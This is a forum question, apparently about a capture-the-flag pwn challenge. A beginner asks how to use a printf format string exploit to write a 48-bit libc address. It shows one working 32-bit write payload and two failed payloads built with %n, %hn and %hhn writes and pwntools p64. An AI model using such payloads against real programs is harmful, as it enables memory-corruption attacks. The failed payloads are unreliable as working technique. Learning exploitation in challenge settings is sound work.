I'm working on a challenge that requires me to overwrite a memory address with a libc address, which is usually around 48 bits. I can write a 32-bit number into an address but with anything larger than that alignment issues start happening and things start breaking. to write the number 0x8e719f2e into into address target_address i would say
payload = b"%36465x%7$n" + b"%4285x%8$hn" + p64(target_address+2) + p64(target_address)
and it works
say you needed to write a libc address like 0x7f4121347120, how would you do it?
some of my failed attempts include:
trying to write each individual byte in descending order %hhn and "A"s for alignment padding:
0x7f4121347120
payload = b"%32x%7$hhnAAA" + b"%1x%8$hhn" + b"%19x%9$hhn" + b"%7x%10$hhn" + b"%48x%11$hhn" + b"%48x%12$hhn" + p64(ta) + p64(ta+3) + p64(ta+2) + p64(ta+4) + p64(ta+1) + p64(ta+5)
trying to two bytes at a time with %hn:
payload = b"%8500x%7$hnAAAAAA" + b"%20460x%8$hn" + b"%3617x%9$hn" + p64(ta+2) + p64(ta) + p64(ta+4)
and finally: trying to write the whole thing at once which obviously doesn't work and will (speaking from experience) brick your whole system.
don't know what else to try. both of these payloads segfault the program.
do I have the wrong idea with this. btw i'm a noob with pwn and this site so please don't roast me
I also understand that there is a function fmtstr_payload from pwntools, but i first want to develop the payload manually for comprehensive purposes.
the point of my question is how can I write a large value with a format string exploit, any help is much appreciated
printf?